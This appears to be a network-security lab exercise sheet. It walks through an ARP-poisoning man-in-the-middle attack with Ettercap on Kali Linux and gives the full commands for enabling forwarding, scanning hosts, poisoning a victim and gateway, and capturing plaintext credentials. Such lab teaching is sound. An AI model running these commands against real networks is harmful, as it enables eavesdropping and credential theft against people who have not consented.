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EXERCISE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 MAN-IN-THE-MIDDLE (MITM) ATTACK USING ETTERCAP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To perform a Man-in-the-Middle (MITM) attack using the Ettercap tool on Kali Linux in order to intercept and analyze network traffic between a victim and a gateway.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SOFTWARE REQUIRED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Kali Linux (Installed on own system)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Ettercap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Terminal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Local network (LAN / Virtual Network)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Two target machines (Victim and Gateway/Router)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PROCEDURE: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1: START KALI LINUX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Boot your Kali Linux system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Login with your credentials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Open the Terminal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2: CHECK ETTERCAP INSTALLATION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ettercap --version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If not installed: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sudo apt install ettercap-graphical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 3: IDENTIFY NETWORK INTERFACE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ip a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Example Interface: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eth0  or  wlan0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STEP 4: ENABLE IP FORWARDING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To allow traffic forwarding through attacker machine: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sudo sysctl -w net.ipv4.ip_forward=1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cat /proc/sys/net/ipv4/ip_forward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5: IDENTIFY TARGET IP ADDRESSES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Find devices on the network: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sudo arp-scan --localnet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192.168.1.5   → Victim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192.168.1.1   → Gateway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STEP 6: START ETTERCAP (TEXT MODE)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sudo ettercap -T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STEP 7: PERFORM ARP POISONING (MITM ATTACK)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sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/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192.168.1.5 → Victim IP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192.168.1.1 → Gateway IP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81675" cy="8286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STEP 8: OBSERVE INTERCEPTED TRAFFIC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Ettercap will start displaying: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Live packets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Protocol details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Credentials (if transmitted in plain text)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STEP 9: CAPTURE USERNAME AND PASSWORD (IF ANY)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If victim accesses insecure services such as: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Telnet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Credentials may appear directly in the terminal output.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STEP 10: STOP THE ATTACK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Press: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STEP 11: DISABLE IP FORWARDING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sudo sysctl -w net.ipv4.ip_forward=0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ALTERNATE METHOD: GRAPHICAL MODE (OPTIONAL)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Open Ettercap GUI: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sudo ettercap -G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Sniff → Unified sniffing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Choose network interface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Hosts → Scan for hosts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Hosts → Host list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Select victim and gateway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MITM → ARP poisoning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Enable sniffing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57550" cy="6286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Network traffic between victim and gateway intercepted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ARP poisoning successfully performed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Plain-text credentials captured (if insecure protocol used)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Thus, the Man-in-the-Middle (MITM) attack was successfully performed using the Ettercap tool on Kali Linux.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This experiment demonstrated how ARP poisoning can be used to intercept network traffic and why encrypted communication protocols are essential for network security.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